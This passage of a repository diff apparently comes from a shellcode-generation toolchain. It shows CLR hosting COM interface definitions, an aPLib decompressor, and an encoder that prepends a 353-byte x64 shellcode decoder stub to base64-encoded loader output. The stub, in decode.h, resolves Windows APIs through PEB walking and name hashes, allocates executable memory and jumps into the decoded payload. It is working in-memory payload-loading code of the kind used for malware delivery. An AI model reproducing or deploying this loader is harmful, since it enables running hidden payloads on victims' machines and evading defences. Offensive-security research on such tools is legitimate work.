645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
+166
-0
loader/depack.c less more
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #include "depack.h"
12
13 /* internal data structure */
14 struct APDSTATE {
15 const unsigned char *source;
16 unsigned char *destination;
17 unsigned int tag;
18 unsigned int bitcount;
19 };
20
21 static unsigned int aP_getbit(struct APDSTATE *ud)
22 {
23 unsigned int bit;
24
25 /* check if tag is empty */
26 if (!ud->bitcount--) {
27 /* load next tag */
28 ud->tag = *ud->source++;
29 ud->bitcount = 7;
30 }
31
32 /* shift bit out of tag */
33 bit = (ud->tag >> 7) & 0x01;
34 ud->tag <<= 1;
35
36 return bit;
37 }
38
39 static unsigned int aP_getgamma(struct APDSTATE *ud)
40 {
41 unsigned int result = 1;
42
43 /* input gamma2-encoded bits */
44 do {
45 result = (result << 1) + aP_getbit(ud);
46 } while (aP_getbit(ud));
47
48 return result;
49 }
50
51 unsigned int aP_depack(const void *source, void *destination)
52 {
53 struct APDSTATE ud;
54 unsigned int offs, len, R0, LWM;
55 int done;
56 int i;
57
58 ud.source = (const unsigned char *) source;
59 ud.destination = (unsigned char *) destination;
60 ud.bitcount = 0;
61
62 R0 = (unsigned int) -1;
63 LWM = 0;
64 done = 0;
65
66 /* first byte verbatim */
67 *ud.destination++ = *ud.source++;
68
69 /* main decompression loop */
70 while (!done) {
71 if (aP_getbit(&ud)) {
72 if (aP_getbit(&ud)) {
73 if (aP_getbit(&ud)) {
74 offs = 0;
75
76 for (i = 4; i; i--) {
77 offs = (offs << 1) + aP_getbit(&ud);
78 }
79
80 if (offs) {
81 *ud.destination = *(ud.destination - offs);
82 ud.destination++;
83 }
84 else {
85 *ud.destination++ = 0x00;
86 }
87
88 LWM = 0;
89 }
90 else {
91 offs = *ud.source++;
92
93 len = 2 + (offs & 0x0001);
94
95 offs >>= 1;
96
97 if (offs) {
98 for (; len; len--) {
99 *ud.destination = *(ud.destination - offs);
100 ud.destination++;
101 }
102 }
103 else {
104 done = 1;
105 }
106
107 R0 = offs;
108 LWM = 1;
109 }
110 }
111 else {
112 offs = aP_getgamma(&ud);
113
114 if ((LWM == 0) && (offs == 2)) {
115 offs = R0;
116
117 len = aP_getgamma(&ud);
118
119 for (; len; len--) {
120 *ud.destination = *(ud.destination - offs);
121 ud.destination++;
122 }
123 }
124 else {
125 if (LWM == 0) {
126 offs -= 3;
127 }
128 else {
129 offs -= 2;
130 }
131
132 offs <<= 8;
133 offs += *ud.source++;
134
135 len = aP_getgamma(&ud);
136
137 if (offs >= 32000) {
138 len++;
139 }
140 if (offs >= 1280) {
141 len++;
142 }
143 if (offs < 128) {
144 len += 2;
145 }
146
147 for (; len; len--) {
148 *ud.destination = *(ud.destination - offs);
149 ud.destination++;
150 }
151
152 R0 = offs;
153 }
154
155 LWM = 1;
156 }
157 }
158 else {
159 *ud.destination++ = *ud.source++;
160 LWM = 0;
161 }
162 }
163
164 return (unsigned int) (ud.destination - (unsigned char *) destination);
165 }
+3
-0
loader/encode/README.txt less more
0
1 compile: cl encode.c mmap-windows.c
2 usage: encode loader.bin base64.txt
+155
-0
loader/encode/decode.h less more
0
1 // Target architecture : X86 64
2
3 #define DECODE_SIZE 353
4
5 char DECODE[] = {
6 /* 0000 */ "\x56" /* push rsi */
7 /* 0001 */ "\x53" /* push rbx */
8 /* 0002 */ "\x57" /* push rdi */
9 /* 0003 */ "\x55" /* push rbp */
10 /* 0004 */ "\xeb\x0a" /* jmp 0x10 */
11 /* 0006 */ "\x5d" /* pop rbp */
12 /* 0007 */ "\x31\xc0" /* xor eax, eax */
13 /* 0009 */ "\xb0\x9b" /* mov al, 0x9b */
14 /* 000B */ "\x48\x01\xe8" /* add rax, rbp */
15 /* 000E */ "\xff\xe0" /* jmp rax */
16 /* 0010 */ "\xe8\xf1\xff\xff\xff" /* call 6 */
17 /* 0015 */ "\x56" /* push rsi */
18 /* 0016 */ "\x53" /* push rbx */
19 /* 0017 */ "\x57" /* push rdi */
20 /* 0018 */ "\x55" /* push rbp */
21 /* 0019 */ "\x41\x89\xc0" /* mov r8d, eax */
22 /* 001C */ "\xeb\x72" /* jmp 0x90 */
23 /* 001E */ "\x41\x59" /* pop r9 */
24 /* 0020 */ "\x6a\x60" /* push 0x60 */
25 /* 0022 */ "\x41\x5b" /* pop r11 */
26 /* 0024 */ "\x65\x49\x8b\x03" /* mov rax, qword ptr gs:[r11] */
27 /* 0028 */ "\x48\x8b\x40\x18" /* mov rax, qword ptr [rax + 0x18] */
28 /* 002C */ "\x48\x8b\x78\x10" /* mov rdi, qword ptr [rax + 0x10] */
29 /* 0030 */ "\xeb\x03" /* jmp 0x35 */
30 /* 0032 */ "\x48\x8b\x3f" /* mov rdi, qword ptr [rdi] */
31 /* 0035 */ "\x48\x8b\x5f\x30" /* mov rbx, qword ptr [rdi + 0x30] */
32 /* 0039 */ "\x48\x85\xdb" /* test rbx, rbx */
33 /* 003C */ "\x74\x4b" /* je 0x89 */
34 /* 003E */ "\x8b\x73\x3c" /* mov esi, dword ptr [rbx + 0x3c] */
35 /* 0041 */ "\x44\x01\xde" /* add esi, r11d */
36 /* 0044 */ "\x8b\x4c\x33\x28" /* mov ecx, dword ptr [rbx + rsi + 0x28] */
37 /* 0048 */ "\x67\xe3\xe7" /* jecxz 0x32 */
38 /* 004B */ "\x48\x8d\x74\x0b\x0c" /* lea rsi, qword ptr [rbx + rcx + 0xc] */
39 /* 0050 */ "\xad" /* lodsd eax, dword ptr [rsi] */
40 /* 0051 */ "\x41\xff\xd1" /* call r9 */
41 /* 0054 */ "\x50" /* push rax */
42 /* 0055 */ "\x41\x5a" /* pop r10 */
43 /* 0057 */ "\xad" /* lodsd eax, dword ptr [rsi] */
44 /* 0058 */ "\xad" /* lodsd eax, dword ptr [rsi] */
45 /* 0059 */ "\xad" /* lodsd eax, dword ptr [rsi] */
46 /* 005A */ "\x91" /* xchg eax, ecx */
47 /* 005B */ "\x67\xe3\xd4" /* jecxz 0x32 */
48 /* 005E */ "\xad" /* lodsd eax, dword ptr [rsi] */
49 /* 005F */ "\x92" /* xchg eax, edx */
50 /* 0060 */ "\x48\x01\xda" /* add rdx, rbx */
51 /* 0063 */ "\xad" /* lodsd eax, dword ptr [rsi] */
52 /* 0064 */ "\x95" /* xchg eax, ebp */
53 /* 0065 */ "\x48\x01\xdd" /* add rbp, rbx */
54 /* 0068 */ "\xad" /* lodsd eax, dword ptr [rsi] */
55 /* 0069 */ "\x96" /* xchg eax, esi */
56 /* 006A */ "\x48\x01\xde" /* add rsi, rbx */
57 /* 006D */ "\x48\x8b\x44\x8d\xfc" /* mov rax, qword ptr [rbp + rcx*4 - 4] */
58 /* 0072 */ "\x41\xff\xd1" /* call r9 */
59 /* 0075 */ "\x44\x01\xd0" /* add eax, r10d */
60 /* 0078 */ "\x44\x39\xc0" /* cmp eax, r8d */
61 /* 007B */ "\xe0\xf0" /* loopne 0x6d */
62 /* 007D */ "\x75\xb3" /* jne 0x32 */
63 /* 007F */ "\x0f\xb7\x04\x4e" /* movzx eax, word ptr [rsi + rcx*2] */
64 /* 0083 */ "\x8b\x04\x82" /* mov eax, dword ptr [rdx + rax*4] */
65 /* 0086 */ "\x48\x01\xc3" /* add rbx, rax */
66 /* 0089 */ "\x48\x93" /* xchg rax, rbx */
67 /* 008B */ "\x5d" /* pop rbp */
68 /* 008C */ "\x5f" /* pop rdi */
69 /* 008D */ "\x5b" /* pop rbx */
70 /* 008E */ "\x5e" /* pop rsi */
71 /* 008F */ "\xc3" /* ret */
72 /* 0090 */ "\xe8\x89\xff\xff\xff" /* call 0x1e */
73 /* 0095 */ "\x52" /* push rdx */
74 /* 0096 */ "\x56" /* push rsi */
75 /* 0097 */ "\x96" /* xchg eax, esi */
76 /* 0098 */ "\x48\x01\xde" /* add rsi, rbx */
77 /* 009B */ "\x31\xc0" /* xor eax, eax */
78 /* 009D */ "\x99" /* cdq */
79 /* 009E */ "\xac" /* lodsb al, byte ptr [rsi] */
80 /* 009F */ "\x08\xc0" /* or al, al */
81 /* 00A1 */ "\x74\x09" /* je 0xac */
82 /* 00A3 */ "\x0c\x20" /* or al, 0x20 */
83 /* 00A5 */ "\x01\xc2" /* add edx, eax */
84 /* 00A7 */ "\xc1\xca\x08" /* ror edx, 8 */
85 /* 00AA */ "\xeb\xf2" /* jmp 0x9e */
86 /* 00AC */ "\x92" /* xchg eax, edx */
87 /* 00AD */ "\x5e" /* pop rsi */
88 /* 00AE */ "\x5a" /* pop rdx */
89 /* 00AF */ "\xc3" /* ret */
90 /* 00B0 */ "\x48\x99" /* cqo */
91 /* 00B2 */ "\xb2\xb1" /* mov dl, 0xb1 */
92 /* 00B4 */ "\x48\x01\xd0" /* add rax, rdx */
93 /* 00B7 */ "\x48\x83\xec\x78" /* sub rsp, 0x78 */
94 /* 00BB */ "\x54" /* push rsp */
95 /* 00BC */ "\x5b" /* pop rbx */
96 /* 00BD */ "\x48\x8d\x7b\x48" /* lea rdi, qword ptr [rbx + 0x48] */
97 /* 00C1 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
98 /* 00C3 */ "\xb8\x39\x81\x4f\x45" /* mov eax, 0x454f8139 */
99 /* 00C8 */ "\xff\xd5" /* call rbp */
100 /* 00CA */ "\x48\xab" /* stosq qword ptr [rdi], rax */
101 /* 00CC */ "\xb8\xd7\x0e\xf5\xe0" /* mov eax, 0xe0f50ed7 */
102 /* 00D1 */ "\xff\xd5" /* call rbp */
103 /* 00D3 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
104 /* 00D5 */ "\xb8\x57\x6d\x60\x46" /* mov eax, 0x46606d57 */
105 /* 00DA */ "\xff\xd5" /* call rbp */
106 /* 00DC */ "\x48\xab" /* stosq qword ptr [rdi], rax */
107 /* 00DE */ "\xb8\xb1\x64\x4a\x3f" /* mov eax, 0x3f4a64b1 */
108 /* 00E3 */ "\xff\xd5" /* call rbp */
109 /* 00E5 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
110 /* 00E7 */ "\x31\xc0" /* xor eax, eax */
111 /* 00E9 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
112 /* 00ED */ "\xff\x53\x58" /* call qword ptr [rbx + 0x58] */
113 /* 00F0 */ "\x89\x43\x44" /* mov dword ptr [rbx + 0x44], eax */
114 /* 00F3 */ "\x31\xd2" /* xor edx, edx */
115 /* 00F5 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
116 /* 00F9 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
117 /* 00FD */ "\x48\x89\x53\x38" /* mov qword ptr [rbx + 0x38], rdx */
118 /* 0101 */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
119 /* 0105 */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
120 /* 0109 */ "\x4d\x31\xc9" /* xor r9, r9 */
121 /* 010C */ "\x6a\x07" /* push 7 */
122 /* 010E */ "\x41\x58" /* pop r8 */
123 /* 0110 */ "\x92" /* xchg eax, edx */
124 /* 0111 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
125 /* 0115 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
126 /* 0118 */ "\x6a\x40" /* push 0x40 */
127 /* 011A */ "\x41\x59" /* pop r9 */
128 /* 011C */ "\x6a\x30" /* push 0x30 */
129 /* 011E */ "\x41\x58" /* pop r8 */
130 /* 0120 */ "\x49\xc1\xe0\x08" /* shl r8, 8 */
131 /* 0124 */ "\x8b\x53\x38" /* mov edx, dword ptr [rbx + 0x38] */
132 /* 0127 */ "\x31\xc9" /* xor ecx, ecx */
133 /* 0129 */ "\xff\x53\x60" /* call qword ptr [rbx + 0x60] */
134 /* 012C */ "\x48\x89\x43\x3c" /* mov qword ptr [rbx + 0x3c], rax */
135 /* 0130 */ "\x31\xd2" /* xor edx, edx */
136 /* 0132 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
137 /* 0136 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
138 /* 013A */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
139 /* 013E */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
140 /* 0142 */ "\x50" /* push rax */
141 /* 0143 */ "\x41\x59" /* pop r9 */
142 /* 0145 */ "\x6a\x07" /* push 7 */
143 /* 0147 */ "\x41\x58" /* pop r8 */
144 /* 0149 */ "\x8b\x53\x44" /* mov edx, dword ptr [rbx + 0x44] */
145 /* 014C */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
146 /* 0150 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
147 /* 0153 */ "\x48\x8b\x43\x3c" /* mov rax, qword ptr [rbx + 0x3c] */
148 /* 0157 */ "\x48\x83\xc4\x78" /* add rsp, 0x78 */
149 /* 015B */ "\x5d" /* pop rbp */
150 /* 015C */ "\x5f" /* pop rdi */
151 /* 015D */ "\x5b" /* pop rbx */
152 /* 015E */ "\x5e" /* pop rsi */
153 /* 015F */ "\xff\xe0" /* jmp rax */
154 };
+119
-0
loader/encode/encode.c less more
0
1
2 // test unit for decode.asm
3 // odzhan
4
5 #include <stdint.h>
6 #include <stdio.h>
7 #include <stdlib.h>
8 #include <string.h>
9 #include <sys/stat.h>
10 #include <inttypes.h>
11 #include <fcntl.h>
12
13 #if defined(_WIN32) || defined(_WIN64)
14 #define WINDOWS
15 #include <windows.h>
16 #include "mmap.h"
17 #if defined(_MSC_VER)
18 #pragma comment(lib, "advapi32.lib")
19 #pragma comment(lib, "user32.lib")
20 #pragma comment(lib, "crypt32.lib")
21 #endif
22 #else
23 #define LINUX
24 #include <unistd.h>
25 #include <sys/types.h>
26 #include <sys/mman.h>
27 #endif
28
29 #include "decode.h"
30
31 uint32_t hash_string(const char *str) {
32 char c;
33 uint32_t h = 0;
34
35 do {
36 c = *str++;
37 if(c == 0) break;
38 h += (c | 0x20);
39 h = (h << 32-8) | (h >> 8);
40 } while(c != 0);
41
42 return h;
43 }
44
45 void bin2hex(void *bin, int len) {
46 int i;
47 uint8_t *p=(uint8_t*)bin;
48
49 for(i=0; i<8; i++) printf(" %02x", p[i]);
50 }
51
52 int main(int argc, char *argv[]) {
53 struct stat fs;
54 int in;
55 FILE *out;
56 char *infile, *outfile;
57 DWORD inlen, outlen;
58 PVOID outbuf, inbuf;
59
60 if(argc != 3) {
61 printf("\nusage: encode <infile> <outfile>\n");
62 return 0;
63 }
64
65 infile = argv[1];
66 outfile = argv[2];
67
68 if(stat(infile, &fs) != 0) {
69 printf("unable to access %s\n", infile);
70 return -1;
71 }
72
73 in = open(infile, O_RDONLY);
74 if(in < 0) {
75 printf("unable to open %s.\n", infile);
76 return -1;
77 }
78
79 out = fopen(outfile, "wb");
80 if(out < 0) {
81 printf("unable to open %s for writing.\n", outfile);
82 close(in);
83 return -1;
84 }
85
86 inlen = fs.st_size;
87 inbuf = mmap(NULL, inlen, PROT_READ, MAP_PRIVATE, in, 0);
88
89 if(inbuf != NULL) {
90 outlen = 0;
91 if(CryptBinaryToString(inbuf, inlen,
92 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &outlen))
93 {
94 outbuf = calloc(1, outlen + DECODE_SIZE + 8);
95 if(outbuf != NULL) {
96 if(CryptBinaryToString(inbuf, inlen,
97 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, outbuf, &outlen))
98 {
99 fwrite(DECODE, 1, DECODE_SIZE, out);
100 fwrite(outbuf, 1, outlen, out);
101 } else {
102 printf("CryptBinaryToString failed.\n");
103 }
104 free(outbuf);
105 } else {
106 printf("unable to allocate memory.\n");
107 }
108 } else {
109 printf("unable to obtain length\n");
110 }
111 munmap(inbuf, inlen);
112 } else {
113 printf("unable to map\n");
114 }
115 fclose(out);
116 close(in);
117 return 0;
118 }
loader/encode/encode.exe less more
Binary diff not shown
+73
-0
loader/encode/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
+45
-0
loader/encode/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+368
-0
loader/exe2h/exe2h.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
